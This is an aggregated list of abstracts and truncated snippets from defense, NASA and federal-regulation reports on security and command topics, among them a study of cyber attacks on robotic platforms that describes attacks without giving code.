moderate, in all three datasets.- Out of 21 primary security classes, five dominated: Exception Management, Memory Access, Other, Risky Values, and Unused Entities. Together, these classes contributed from around 80 to 90 of all security issues in each dataset. This again proves the Pareto principle of uneven distribution of security issues, in this case across CWE classes, and supports the fact that addressing these dominant security classes provides the most cost efficient way to improve missions' security. The findings presented in this report uncovered the security vulnerability profiles and identified the common trends and dominant classes of security issues, which in turn can be used to select the most efficient secure design and coding best practices compiled by the part of the SARP project team associated with the NASA's Johnson Space Center. In addition, these findings provide valuable input to the NASA IVV initiative aimed at identification of the two 25 CWEs of ground and flight missions.
2008-06-13
USE PRIVATE SECURITY CONTRACTORS TO PROTECT U.S. DIPLOMATS 5c. PROGRAM ELEMENT NUMBER 5d. PROJECT NUMBER 5e. TASK NUMBER 6. AUTHOR( S ...Special Agent Derek Dela-Cruz 5f. WORK UNIT NUMBER 7. PERFORMING ORGANIZATION NAME( S ) AND ADDRESS(ES) U.S. Army Command and General Staff College...
Waterside Security 2010 (WSS 2010) Conference: Post Conference Report
2011-02-01
Memorandum Report NURC-MR-2011-002 Waterside Security 2010 (WSS2010) Conference: post conference report Ronald Kessel and...in NATO, NURC conducts maritime research in support of NATO’s operational and transformation requirements. Reporting to the Supreme Allied Commander...independent business process certification. Copyright © NURC 2011. NATO member nations have unlimited rights to use, modify, reproduce, release
The Land Component Role in Maritime Security
2016-12-31
U.S. Army Pacific (USARPAC) is designated as the Theater Joint Force Land Component Command (TJFLCC) and endeavors to support the PACOM Theater ...security. 1 Mike Wall , “What 11 Billion People Mean for Space Travel,” November 27, 2013...human outcomes that are a prerequisite for achieving national objectives”18. These are land-based operations designed to create stability in human
2005-06-01
provisioning, maintaining and guaranteeing service levels for the shared services ? Although these shared, distributed services lie well within the... shared services that interact with a common object definition for transporting alerts. The system is built on top of a rapid SOA application
Requirements For Security Sector Reform Success
2016-05-26
Advanced Military Studies United States Army Command and General Staff College Fort Leavenworth, Kansas 2016 Approved for public release...ACRONYM(S) School of Advanced Military Studies , Advanced Military Studies Program 11. SPONSOR/MONITOR’S REPORT NUMBER(S) 12. DISTRIBUTION...political and economic stability are required for Security Sector Reform (SSR) success over the long term. This study suggests that states with stable
Secure, Autonomous, Intelligent Controller for Integrating Distributed Sensor Webs
NASA Technical Reports Server (NTRS)
Ivancic, William D.
2007-01-01
This paper describes the infrastructure and protocols necessary to enable near-real-time commanding, access to space-based assets, and the secure interoperation between sensor webs owned and controlled by various entities. Select terrestrial and aeronautics-base sensor webs will be used to demonstrate time-critical interoperability between integrated, intelligent sensor webs both terrestrial and between terrestrial and space-based assets. For this work, a Secure, Autonomous, Intelligent Controller and knowledge generation unit is implemented using Virtual Mission Operation Center technology.
2005-02-14
hour per response, including the time for reviewing instructions, searching existing data sources, gathering and maintaining the data needed , and...the national level, the National Security Act of 1947 (NSA 47) mandates the need for interagency cooperation.6 In this regard, the National Security...within DoD, it lacks a central body or mechanism to provide the overarching, truly ’global’ oversight and guidance needed to ensure adequate interagency
2010-01-01
strategic partnerships, national security planning (and theater security cooperation) and US Africa Command (AFRICOM) in securing long term access to...A potential constraint on the supply of strategic minerals is the lack of a US industrial policy and contingency plans in case the flow of... planning for various contingencies, particularly for the 2020s and beyond. The region contains high concentrations of platinum group metals (PGMs
32 CFR 813.3 - Responsibilities.
Code of Federal Regulations, 2010 CFR
2010-07-01
... component and joint commands with deliberate and crisis action planning for USAF's COMCAM assets. (6... and 2, and AFI 31-401, Information Security Program Management. The authority in charge of the event...
IT Security Support for Spaceport Command and Control System
NASA Technical Reports Server (NTRS)
McLain, Jeffrey
2013-01-01
During the fall 2013 semester, I worked at the Kennedy Space Center as an IT Security Intern in support of the Spaceport Command and Control System under the guidance of the IT Security Lead Engineer. Some of my responsibilities included assisting with security plan documentation collection, system hardware and software inventory, and malicious code and malware scanning. Throughout the semester, I had the opportunity to work on a wide range of security related projects. However, there are three projects in particular that stand out. The first project I completed was updating a large interactive spreadsheet that details the SANS Institutes Top 20 Critical Security Controls. My task was to add in all of the new commercial of the shelf (COTS) software listed on the SANS website that can be used to meet their Top 20 controls. In total, there are 153 unique security tools listed by SANS that meet one or more of their 20 controls. My second project was the creation of a database that will allow my mentor to keep track of the work done by the contractors that report to him in a more efficient manner by recording events as they occur throughout the quarter. Lastly, I expanded upon a security assessment of the Linux machines being used on center that I began last semester. To do this, I used a vulnerability and configuration tool that scans hosts remotely through the network and presents the user with an abundance of information detailing each machines configuration. The experience I gained from working on each of these projects has been invaluable, and I look forward to returning in the spring semester to continue working with the IT Security team.
The Report of the Independent Commission on the Security Forces of Iraq
2007-09-06
Jday’l Ayfan Facilitator Abdallah Ahmad Isma’il Ibrahim AQI External Facilitator Imad Abd Abbas Nassir AQI Weapons Facilitator Ahmed Sancar AQI Foreign...example, a minimum of three bids are required for any contract above 25 million dinars (about $20,000). MOD officials told the Commission that if fewer...Ministry of Defense headquarters in Baghdad and by an operational commander, Commander Ahmed Maarij, in Umm Qasr; its leadership reports to the Iraqi
A Study of the Emergency Medical Service System at Womack Army Hospital, Fort Bragg, North Carolina.
1978-04-01
SECURITY CLASSIFICATION OF THIS PAGE ACKNOWLEDGEMENTS Special thanks must be given to Colonel Llewellyn Legters , Colonel Joseph E. Brannock, and Major James...DEPARTMENT OF THE ARMY HEADQUARTERS. UNITED STATES ARMY HEALTH SERVICES COMMAND FORT SAIA HOUSTON. TEXAS 78234 HSPA 2 2 .0 7 Colonel Llewellyn J. Legters ...Commander US Army Medical Department Activity Fort Bragg, NC 28307 Dear Colonel Legters : The continuing military physician shortage is the most
2015-10-01
October 2015 TYPE OF REPORT: Annual Report PREPARED FOR: U.S. Army Medical Research and Materiel Command Fort Detrick, Maryland 21702-5012...AND ADDRESS(ES) 10. SPONSOR/MONITOR’S ACRONYM(S) U.S. Army Medical Research and Materiel Command Fort Detrick, Maryland 21702-5012 11. SPONSOR...no funds have been used to date. 15. SUBJECT TERMS Gulf war illness; magnetic resonance imaging; dopamine ; diffusion tensor imaging 16. SECURITY
2013-01-01
underground, cross-border tunnels to attack high-value targets like command and control nodes or air bases. Theater Ballistic Missiles. North Korea has...fomenting unrest and revolution. Command and Control. The DPRK National Defense Commission ( NDC ) is the symbolic nominal authority over the North’s...and control is exercised by its subordinate General Staff Department. The 1992 constitution gives control of the North’s military to the NDC , and
2012-02-14
Director of the Air National Guard20 Lt Gen Charles E. Stenner Jr., Chief of the Air Force Reserve21 Specificity about what rebalancing the force...January 2012). Sharp, Travis. Vision Meets Reality: 2010 QDR and 2011 Defense Budget. Center for a New American Security, February 2010. Stenner ...Lt Gen Charles E. Stenner Jr., commander of Air Force Reserve Command (address, Air Force Reserve Senior Leader Conference
USAF Presence in Latin America in the 21st Century.
1988-04-01
faculty in partial fulfillment of requirements for graduation. AIR COMMAND AND STAFF COLLEGE AIR UNIVERSITY MAXWELL AFB, AL 36112 UNCLASSIFIED SECURITY...ADDRESS (City, State, and ZIP Code) 7b. ADDRESS (City, State, and ZIP Code) Maxwell AFB AL 36112-5542 Ba. NAME OF FUNDING /SPONSORING 8 b. OFFICE SYMBOL... Servicio Multimodal Transistmico across the Isthmus of Tehuantepec (11:28). It does, however. *%4 row:n militaiy importance. The U.S. Atlantic Command’s
Space Internet-Embedded Web Technologies Demonstration
NASA Technical Reports Server (NTRS)
Foltz, David A.
2001-01-01
The NASA Glenn Research Center recently demonstrated the ability to securely command and control space-based assets by using the Internet and standard Internet Protocols (IP). This is a significant accomplishment because future NASA missions will benefit by using Internet standards-based protocols. The benefits include reduced mission costs and increased mission efficiency. The Internet-Based Space Command and Control System Architecture demonstrated at the NASA Inspection 2000 event proved that this communications architecture is viable for future NASA missions.
Information Systems, Security, and Privacy.
ERIC Educational Resources Information Center
Ware, Willis H.
1984-01-01
Computer security and computer privacy issues are discussed. Among the areas addressed are technical and human security threats, security and privacy issues for information in electronic mail systems, the need for a national commission to examine these issues, and security/privacy issues relevant to colleges and universities. (JN)
The emergence of Zipf's law - Spontaneous encoding optimization by users of a command language
NASA Technical Reports Server (NTRS)
Ellis, S. R.; Hitchcock, R. J.
1986-01-01
The distribution of commands issued by experienced users of a computer operating system allowing command customization tends to conform to Zipf's law. This result documents the emergence of a statistical property of natural language as users master an artificial language. Analysis of Zipf's law by Mandelbrot and Cherry shows that its emergence in the computer interaction of experienced users may be interpreted as evidence that these users optimize their encoding of commands. Accordingly, the extent to which users of a command language exhibit Zipf's law can provide a metric of the naturalness and efficiency with which that language is used.
Alexa, Siri, Cortana, and More: An Introduction to Voice Assistants.
Hoy, Matthew B
2018-01-01
Voice assistants are software agents that can interpret human speech and respond via synthesized voices. Apple's Siri, Amazon's Alexa, Microsoft's Cortana, and Google's Assistant are the most popular voice assistants and are embedded in smartphones or dedicated home speakers. Users can ask their assistants questions, control home automation devices and media playback via voice, and manage other basic tasks such as email, to-do lists, and calendars with verbal commands. This column will explore the basic workings and common features of today's voice assistants. It will also discuss some of the privacy and security issues inherent to voice assistants and some potential future uses for these devices. As voice assistants become more widely used, librarians will want to be familiar with their operation and perhaps consider them as a means to deliver library services and materials.
2004-10-04
Security controls access to the Soyuz capsule and test stand area, Friday, Oct. 5, 2004, at the Baikonur Cosmodrome. Expedition 10 Commander and NASA Science Officer Leroy Chiao, Flight Engineer and Soyuz Commander Salizhan Sharipov and Russian Space Forces Cosmonaut Yuri Shargin donned their launch and entry suits and climbed aboard their Soyuz TMA-5 for a dress rehearsal of launch day activities leading to their liftoff October 14 to the International Space Station. Chiao and Sharipov, the first crew of all-Asian extraction, will spend six months on the Station. Shargin will return to Earth October 24 with the Stations' current residents, Expedition 9 Commander Gennady Padalka and NASA Flight Engineer and Science Officer Mike Fincke. Photo Credit: (NASA/Bill Ingalls)
Security and health research databases: the stakeholders and questions to be addressed.
Stewart, Sara
2006-01-01
Health research database security issues abound. Issues include subject confidentiality, data ownership, data integrity and data accessibility. There are also various stakeholders in database security. Each of these stakeholders has a different set of concerns and responsibilities when dealing with security issues. There is an obvious need for training in security issues, so that these issues may be addressed and health research will move on without added obstacles based on misunderstanding security methods and technologies.
Conceptual Architecture for Obtaining Cyber Situational Awareness
2014-06-01
1-893723-17-8. [10] SKYBOX SECURITY. Developer´s Guide. Skybox View. Manual.Version 11. 2010. [11] SCALABLE Network. EXata communications...E. Understanding command and control. Washington, D.C.: CCRP Publication Series, 2006. 255 p. ISBN 1-893723-17-8. • [10] SKYBOX SECURITY. Developer...s Guide. Skybox View. Manual.Version 11. 2010. • [11] SCALABLE Network. EXata communications simulation platform. Available: <http://www.scalable
NATO Cyberspace Capability: A Strategic and Operational Evolution
2016-06-01
Coalition 2012 was run concur- 24 rently with the annual NATO Crisis Management Ex - ercise (CMX), an internal command post exercise that does not involve...concerning the role of ground forces in achieving national security objectives. The Strategic Studies Institute publishes national security and...international audience, and honor Soldiers—past and present. STRATEGIC STUDIES INSTITUTE The Strategic Studies Institute (SSI) is part of the U.S
United States Homeland Security and National Biometric Identification
2002-04-09
security number. Biometrics is the use of unique individual traits such as fingerprints, iris eye patterns, voice recognition, and facial recognition to...technology to control access onto their military bases using a Defense Manpower Management Command developed software application. FACIAL Facial recognition systems...installed facial recognition systems in conjunction with a series of 200 cameras to fight street crime and identify terrorists. The cameras, which are
A Joint Force Medical Command is Required to Fix Combat Casualty Care
2017-10-05
that poses an operations security risk. Author: ☒ PA: ☒ 13. SUPPLEMENTARY NOTES Word Count: 10,665 14. ABSTRACT The Military Health System...15. SUBJECT TERMS Military Health System, Joint Trauma System, Defense Health Agency, PROFIS 16. SECURITY CLASSIFICATION OF: 17...The Military Health System (MHS) is required to provide medical operational forces for military and contingency operations while also providing
Mission Command: Retooling the Leadership Paradigm for Homeland Security Crisis Response?
2015-03-01
security crisis management. While, there is some literature regarding the efforts by the USFS and the federal wildland firefighting community towards...psychologically stressful and potentially overwhelming. The need to communicate and cooperate with other agencies in a crisis places added...environment where formal hierarchies and tightly controlled plans may become irrelevant in a crisis . Grant and De Waard examined the communication
Geospatial Informational Security Risks and Concerns of the U.S. Air Force GeoBase Program
2007-03-01
multiple governmental directives such as the Government Performance and Results Act (GPRA), Paperwork Reduction Act (PRA), and Office of Management and... governments , non- governmental organizations (NGOs), universities, and commercial sector contractors (Lachman, 2006). One command noted that over...Defense, or the United States Government . AFIT/GEM/ENV/07-M1 GEOSPATIAL INFORMATIONAL SECURITY RISKS AND CONCERNS OF THE UNITED STATES
1990-07-01
i k RAYMOND P. URTZ, JR. Technical Director Directorate of Command & Control FOR TH!E C0OKANDER: IGOR G. PLONISCH Directorate of Plans & Programs If...access controls and for thwarting inference and aggregation attacks ae generally considered inadequate for high usurance systems. Consequently, thee is...requirements was to have been based on a state-of-the-art survey involving interviews with TDBMS researchers and developers and security officers and auditors
The Reserve Forces Impact on Theater Security Cooperation
2013-03-01
in South America there are needs for purification is spoiled water, prophylactics, and typhoid , malaria, and yellow fever vaccines. Professions...Theater Security Cooperation (TSC) is a Phase 0 ( shaping ) instrument of regional commanders and is applied with the intent of precluding the use of...military force. The U.S. Army War College (USAWC) Theater Campaign Planning Handbook describes Phase 0 operations as “those shaping activities
33 CFR 66.01-3 - Delegation of authority to District Commanders.
Code of Federal Regulations, 2012 CFR
2012-07-01
... HOMELAND SECURITY AIDS TO NAVIGATION PRIVATE AIDS TO NAVIGATION Aids to Navigation Other Than Federal or... establish and maintain, discontinue, change or transfer ownership of private aids to maritime navigation...
33 CFR 66.01-3 - Delegation of authority to District Commanders.
Code of Federal Regulations, 2014 CFR
2014-07-01
... HOMELAND SECURITY AIDS TO NAVIGATION PRIVATE AIDS TO NAVIGATION Aids to Navigation Other Than Federal or... establish and maintain, discontinue, change or transfer ownership of private aids to maritime navigation...
33 CFR 66.01-3 - Delegation of authority to District Commanders.
Code of Federal Regulations, 2013 CFR
2013-07-01
... HOMELAND SECURITY AIDS TO NAVIGATION PRIVATE AIDS TO NAVIGATION Aids to Navigation Other Than Federal or... establish and maintain, discontinue, change or transfer ownership of private aids to maritime navigation...
33 CFR 66.01-3 - Delegation of authority to District Commanders.
Code of Federal Regulations, 2011 CFR
2011-07-01
... HOMELAND SECURITY AIDS TO NAVIGATION PRIVATE AIDS TO NAVIGATION Aids to Navigation Other Than Federal or... establish and maintain, discontinue, change or transfer ownership of private aids to maritime navigation...
33 CFR 54.07 - Service of notice upon designated Coast Guard official.
Code of Federal Regulations, 2010 CFR
2010-07-01
... sent to Commanding Officer, Coast Guard Human Resources Service and Information Center, Federal... HOMELAND SECURITY PERSONNEL ALLOTMENTS FROM ACTIVE DUTY PAY FOR CERTAIN SUPPORT OBLIGATIONS § 54.07 Service...
33 CFR 66.01-3 - Delegation of authority to District Commanders.
Code of Federal Regulations, 2010 CFR
2010-07-01
... HOMELAND SECURITY AIDS TO NAVIGATION PRIVATE AIDS TO NAVIGATION Aids to Navigation Other Than Federal or... establish and maintain, discontinue, change or transfer ownership of private aids to maritime navigation...
2004-03-23
operations, and security. • Provide fi scal fl exibility for commanders. Commanders should be free to use O& M monies, conduct MEDCAP and pay claims when...contingencies. Doctrinally, the AC Civil Affairs component provides the initial ( M Day) “generalist” capability, while the RC provides the “functional” CA...expertise at M +30 to 60 days. However, the situation in Afghanistan demanded early RC expertise. Partial mobilizations had to be done to obtain key
Technology and the Evolution of the Strategic Air Command and the Air Force Space Command.
1990-04-01
agree for the most part that technology is having a major effect upon national security and that it should be encouraged and even pushed in the key areas... effecting defense. (7 :7 ) America’s leadership is linked directly to its ability to adapt to technological innovations which have improved its...naviq,.tion, propulsion systems, electronic warfare systems, Ladars, and cockpit controls and displays much work still needs to be done. Pave Pillar is
Agility through Automated Negotiation for C2 Services
2014-06-01
using this e-contract negotiation methodology in a C2 context in Brazil. We have modeled the operations of the Rio de Janeiro Command Center that will be...methodology in a C2 context in Brazil. We have modeled the operations of the Rio de Janeiro Command Center that will be in place for the World Cup (2014...through e-contracts. The scenario chosen to demonstrate this methodology is a security incident in Rio de Janeiro , host city of the next World Cup (2014
2005-09-01
distributed. The final recommendations concluded that the geographical boundaries of USPACOM would include the entire Indian Ocean to the east coast of...strategically be located within the sub-region of West Africa or East Africa. 15. NUMBER OF PAGES 94 14. SUBJECT TERMS US National Interests...should strategically be located within the sub-region of West Africa or East Africa. vi THIS PAGE
Report to the Commission to Assess United States National Security Space Management and Organization
2001-01-11
including the Vice Chairman, Joint Chiefs of Staff, the Chief of Staff of the Air Force and, in a three-day session in Colorado Springs, Colorado , the...Naval Space Command serves as the Alternate Space Command Center to U.S. Space Command’s primary center located at Cheyenne Mountain, Colorado . It is...Fogleman, United States Air Force (Retired) General Fogleman is president and chief operating officer of the B Bar J Cattle and Consulting Company, Durango
2008-10-01
aussi remarqué une proportion légèrement plus élevée de comptes rendus irrésolus qui mentionnaient l’honneur et la fierté personnels, comparativement ...military commanders during overseas missions. Note that the original interview protocol was semi-structured and designed to allow the interviewee to...should be selected so that no security classification is required. Identifiers, such as equipment model designation , trade name, military project code
1988-05-01
less than happy with parts of the ROE. Also, a commander in chief Central Command staff officer told me that Gen. George C . Crist was not happy with...the Committee on Armed Services traveled to the Persian Gulf to interview Stark’s crew members. The members, Les Aspin, Bill Nichols, and William ...first hit. (7:32) Admiral Sharp did, however, find fault with the ship’s tactical action officer, Lieutenant Basil E. Moncrief , Jr. "who had been
Air Force KC-X Tanker Aircraft Program: Background and Issues for Congress
2010-03-12
obtained by CRS. 16 Gopal Ratnam and Alison Fitzgerald , “Northrop Declines Tanker Bid on...1-50. 19 Statement of General Duncan J. McNabb, USAF, Commander, United States Transportation Command, Before the House Armed Services Air & Land
6 CFR 27.203 - Calculating the screening threshold quantity by security issue.
Code of Federal Regulations, 2012 CFR
2012-01-01
... 6 Domestic Security 1 2012-01-01 2012-01-01 false Calculating the screening threshold quantity by security issue. 27.203 Section 27.203 Domestic Security DEPARTMENT OF HOMELAND SECURITY, OFFICE OF THE... the screening threshold quantity by security issue. (a) General. In calculating whether a facility...
46 CFR 8.320 - Classification society authorization to issue international certificates.
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 1 2010-10-01 2010-10-01 false Classification society authorization to issue... Classification society authorization to issue international certificates. (a) The Commandant may authorize a recognized classification society to issue certain international convention certificates. Authorization will...
1987-03-01
information and work in a completely secure environment. Information used with today’s C3I systems must be protected. To better understand the role of...and security was of minor concern. The user either worked on his own behalf or as a programmer for someone else. The computer power was limited. With...Although the modules may be of the same classification level, the manager may want to limit each team’s access to the module on which they are working
Cyber Threat Assessment of Uplink and Commanding System for Mission Operation
NASA Technical Reports Server (NTRS)
Ko, Adans Y.; Tan, Kymie M. C.; Cilloniz-Bicchi, Ferner; Faris, Grant
2014-01-01
Most of today's Mission Operations Systems (MOS) rely on Ground Data System (GDS) segment to mitigate cyber security risks. Unfortunately, IT security design is done separately from the design of GDS' mission operational capabilities. This incoherent practice leaves many security vulnerabilities in the system without any notice. This paper describes a new way to system engineering MOS, to include cyber threat risk assessments throughout the MOS development cycle, without this, it is impossible to design a dependable and reliable MOS to meet today's rapid changing cyber threat environment.
Why Brilliant Military Leaders Fail: Learning from Their Mistakes
2009-03-24
systemic issue, military culture holds the commander or leader ultimately responsible for that happens within the command. A military commander is...Johnson, Wang Labs, Samsung Motors, 5 Schwinn, and even the Boston Red Sox have met with dramatic failure.13 From the numerous theories of why a...of the need for a convoy system to protect merchant shipping. Yet, it was not until six months after the United States entered the war, May 1942
Handbook of emergency management for state-level transportation agencies.
DOT National Transportation Integrated Search
2010-03-01
The Department of Homeland Security has mandated specific systems and techniques for the management of emergencies in the United States, including the Incident Command System, the National Incident Management System, Emergency Operations Plans, Emerg...
Terrain Commander: a next-generation remote surveillance system
NASA Astrophysics Data System (ADS)
Finneral, Henry J.
2003-09-01
Terrain Commander is a fully automated forward observation post that provides the most advanced capability in surveillance and remote situational awareness. The Terrain Commander system was selected by the Australian Government for its NINOX Phase IIB Unattended Ground Sensor Program with the first systems delivered in August of 2002. Terrain Commander offers next generation target detection using multi-spectral peripheral sensors coupled with autonomous day/night image capture and processing. Subsequent intelligence is sent back through satellite communications with unlimited range to a highly sophisticated central monitoring station. The system can "stakeout" remote locations clandestinely for 24 hours a day for months at a time. With its fully integrated SATCOM system, almost any site in the world can be monitored from virtually any other location in the world. Terrain Commander automatically detects and discriminates intruders by precisely cueing its advanced EO subsystem. The system provides target detection capabilities with minimal nuisance alarms combined with the positive visual identification that authorities demand before committing a response. Terrain Commander uses an advanced beamforming acoustic sensor and a distributed array of seismic, magnetic and passive infrared sensors to detect, capture images and accurately track vehicles and personnel. Terrain Commander has a number of emerging military and non-military applications including border control, physical security, homeland defense, force protection and intelligence gathering. This paper reviews the development, capabilities and mission applications of the Terrain Commander system.
Discrete Event Simulation for the Analysis of Artillery Fired Projectiles from Shore
2017-06-01
a designed experiment indicate artillery systems provide commanders a limited area denial capability, and should be employed where naval forces are... Design 15. NUMBER OF PAGES 85 16. PRICE CODE 17. SECURITY CLASSIFICATION OF REPORT Unclassified 18. SECURITY CLASSIFICATION OF THIS PAGE Unclassified 19...to deny freedom of navigation (area denial) and stop an amphibious naval convoy (anti-access). Results from a designed experiment indicate artillery
National Security Strategy of Charles De Gaulle
1994-01-01
nineteenth century education that was steeped in classical traditions and the collective French psychology of France as a strong, glorious and powerful...NATO in 1963 and French officers from the NATO command headquarters in 1964; and the scuttling of the United States multilateral nuclear force project ... France and about French security without her participation. The successful testing of the atomic bomb in France in 1960 ensured that France could not be
Enduring Attraction: America’s Dependence on and Need to Secure Its Supply of Permanent Magnets
2011-02-16
AIR WAR COLLEGE AIR UNIVERSITY ENDURING ATTRACTION: AMERICA‟S DEPENDENCE ON AND NEED TO SECURE ITS SUPPLY OF PERMANENT MAGNETS by...February 2011 Distribution A: Approved for public release; distribution unlimited ii DISCLAIMER The views expressed in this academic...command of the 628th Mission Support Group at Joint Base Charleston, South Carolina following graduation from Air War College. iv TABLE OF CONTENTS
Lincoln Laboratory Journal. Volume 22, Number 1, 2016
2016-06-09
needs cyber ranges and other infrastructure to conduct scal- able, repeatable, scientific, realistic and inexpensive testing, training, and mission...support this mission, infrastructure is being upgraded to make it more efficient and secure. In “Secur- ing the U.S. Transportation Command,” Jeff...using the Electronic Key Management System (EKMS) or over a digital network by using the Key Manage- ment Infrastructure (KMI). The units must then
Combat Trains Command Post (CTCP) Operations
2016-10-28
organization inclusive of logistical, administrative, and maintenance functions. The squadron’s ability to conduct sustained reconnaissance and security...evolving problem as the troop 1SG had the responsibility to tie in all disabled vehicles awaiting parts into the security plan. The crews of those...sand bags. Once the task organization with inclusion of the UMCP was finalized, a standard Class IV package needed to be identified prior to line of
1999-04-01
headquarters element focuses on command and control of the platoon. It travels with a scout squad for security, but it positions itself as needed... focus the scout platoon on its mission by telling the platoon leader what is expected of the reconnaissance or security effort in each phase of the...well as the tactical opportunities it offers. IPB products developed during this step focus on these effects; they include, but are not limited to
Threats at Our Threshold: Homeland Defense and Homeland Security in the New Century
2006-10-21
evacuation. Meanwhile, DoD C4ISR (Command, Control, Communications, Computers , Intelligence, Surveillance and Reconnaissance) assets can provide state-of...hurricane and flooding. In addition, he challenged the company to find a way to track all supplies even though the computer systems were down...relevant to the homeland security realm. In general terms, individuals empowered with computing and communications technology and connected by
46 CFR 8.320 - Classification society authorization to issue international certificates.
Code of Federal Regulations, 2011 CFR
2011-10-01
... classification society authorized to issue international convention certificates. This agreement will define the... 46 Shipping 1 2011-10-01 2011-10-01 false Classification society authorization to issue... Classification society authorization to issue international certificates. (a) The Commandant may authorize a...
DOT National Transportation Integrated Search
1996-09-01
While most issues of the Maritime Security Report deal with the security situation in geographic area, the articles in this issue deal with publications, training courses, and policy developments which contribute to deterring opportunities for crimin...
Network Visualization Project (NVP)
2016-07-01
network visualization, network traffic analysis, network forensics 16. SECURITY CLASSIFICATION OF: 17. LIMITATION OF ABSTRACT UU 18. NUMBER OF...shell, is a command-line framework used for network forensic analysis. Dshell processes existing pcap files and filters output information based on
Analyzing Cyber-Physical Threats on Robotic Platforms.
Ahmad Yousef, Khalil M; AlMajali, Anas; Ghalyon, Salah Abu; Dweik, Waleed; Mohd, Bassam J
2018-05-21
Robots are increasingly involved in our daily lives. Fundamental to robots are the communication link (or stream) and the applications that connect the robots to their clients or users. Such communication link and applications are usually supported through client/server network connection. This networking system is amenable of being attacked and vulnerable to the security threats. Ensuring security and privacy for robotic platforms is thus critical, as failures and attacks could have devastating consequences. In this paper, we examine several cyber-physical security threats that are unique to the robotic platforms; specifically the communication link and the applications. Threats target integrity, availability and confidential security requirements of the robotic platforms, which use MobileEyes/arnlServer client/server applications. A robot attack tool (RAT) was developed to perform specific security attacks. An impact-oriented approach was adopted to analyze the assessment results of the attacks. Tests and experiments of attacks were conducted in simulation environment and physically on the robot. The simulation environment was based on MobileSim; a software tool for simulating, debugging and experimenting on MobileRobots/ActivMedia platforms and their environments. The robot platform PeopleBot TM was used for physical experiments. The analysis and testing results show that certain attacks were successful at breaching the robot security. Integrity attacks modified commands and manipulated the robot behavior. Availability attacks were able to cause Denial-of-Service (DoS) and the robot was not responsive to MobileEyes commands. Integrity and availability attacks caused sensitive information on the robot to be hijacked. To mitigate security threats, we provide possible mitigation techniques and suggestions to raise awareness of threats on the robotic platforms, especially when the robots are involved in critical missions or applications.
Analyzing Cyber-Physical Threats on Robotic Platforms †
2018-01-01
Robots are increasingly involved in our daily lives. Fundamental to robots are the communication link (or stream) and the applications that connect the robots to their clients or users. Such communication link and applications are usually supported through client/server network connection. This networking system is amenable of being attacked and vulnerable to the security threats. Ensuring security and privacy for robotic platforms is thus critical, as failures and attacks could have devastating consequences. In this paper, we examine several cyber-physical security threats that are unique to the robotic platforms; specifically the communication link and the applications. Threats target integrity, availability and confidential security requirements of the robotic platforms, which use MobileEyes/arnlServer client/server applications. A robot attack tool (RAT) was developed to perform specific security attacks. An impact-oriented approach was adopted to analyze the assessment results of the attacks. Tests and experiments of attacks were conducted in simulation environment and physically on the robot. The simulation environment was based on MobileSim; a software tool for simulating, debugging and experimenting on MobileRobots/ActivMedia platforms and their environments. The robot platform PeopleBotTM was used for physical experiments. The analysis and testing results show that certain attacks were successful at breaching the robot security. Integrity attacks modified commands and manipulated the robot behavior. Availability attacks were able to cause Denial-of-Service (DoS) and the robot was not responsive to MobileEyes commands. Integrity and availability attacks caused sensitive information on the robot to be hijacked. To mitigate security threats, we provide possible mitigation techniques and suggestions to raise awareness of threats on the robotic platforms, especially when the robots are involved in critical missions or applications. PMID:29883403
Incentive Issues in Information Security Management
ERIC Educational Resources Information Center
Lee, Chul Ho
2012-01-01
This dissertation studies three incentive issues in information security management. The first essay studies contract issues between a firm that outsources security functions and a managed security service provider (MSSP) that provides security functions to the firm. Since MSSP and firms cannot observe each other's actions, both can suffer…
Telescience in the Space Station era
NASA Technical Reports Server (NTRS)
Schmerling, E. R.
1988-01-01
Telescience refers to the development of systems where participants involved in research in space can access their fellow scientists and the appropriate NASA services before flight, during flight, and after flight, preferably from their home institutions and through the same equipment. Telescience requires integration of available technologies to develop computer environments that maintain interoperability across different disciplines and different portions of the lifetimes of space experiments, called teledesign, teleoperations, and teleanalysis. Participants in the NASA Telescience Testbed Program are using a rigid prototyping approach to evaluate the necessary technologies and select the options and tradeoffs that best suit their accustomed modalities. The concept of transaction management is described, where the emphasis is placed on the effects of commands, whether event-generated onboard the spacecraft or sent up from the ground. Interoperability, security, and privacy issues are also discussed, and the Telescience Testbed Pilot Program is described.
33 CFR 1.01-60 - Delegations for issuance of bridge permits.
Code of Federal Regulations, 2011 CFR
2011-07-01
... bridge permits. 1.01-60 Section 1.01-60 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF... bridge permits. (a) The Commandant delegates to the Deputy Commandant for Operations (CG-DCO), the authority to issue the following permits for the construction, reconstruction, or alteration of bridges...
76 FR 69293 - U.S. Army Installation Management Command; Notice of Issuance of Director's Decision
Federal Register 2010, 2011, 2012, 2013, 2014
2011-11-08
... NUCLEAR REGULATORY COMMISSION [NRC-2009-0352; Docket No. 40-09083] U.S. Army Installation Management Command; Notice of Issuance of Director's Decision Notice is hereby given that the Director, Office of Federal and State Materials and Environmental Management Programs (FSME) has issued a Director...
46 CFR 42.13-5 - Strength of vessel.
Code of Federal Regulations, 2010 CFR
2010-10-01
... information to the Commandant. (b) Vessels built and maintained in conformity with the requirements of a classification society recognized by the Commandant are considered to possess adequate strength for the purpose... General Rules for Determining Load Lines § 42.13-5 Strength of vessel. (a) The assigning and issuing...
46 CFR 154.22 - Foreign flag vessel: Certificate of Compliance endorsement application.
Code of Federal Regulations, 2010 CFR
2010-10-01
... requesting an endorsement for the carriage of ethylene oxide, a classification society certification that the... Commanding Officer, Marine Safety Center the plans, calculations, and information under § 154.15(b). [CGD 77... foreign flag vessel, whose flag administration issues IMO Certificates, must submit to the Commanding...
The Unified Command Plan and Combatant Commands: Background and Issues for Congress
2013-01-03
Forces, also known as Green Berets; Rangers ; Civil Affairs, and Military Information Support Operations (MISO)—formerly known as psychological...Soto Cano Air Base, Honduras, and operates a forward, all weather, day/night C-5 Galaxy -capable air base. JTF-Bravo organizes multilateral exercises
33 CFR 1.01-60 - Delegations for issuance of bridge permits.
Code of Federal Regulations, 2010 CFR
2010-07-01
... bridge permits. 1.01-60 Section 1.01-60 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF... bridge permits. (a) The Commandant delegates to the Deputy Commandant for Operations (CG-DCO), the authority to issue the following permits for the construction, reconstruction, or alteration of bridges...
2004-05-01
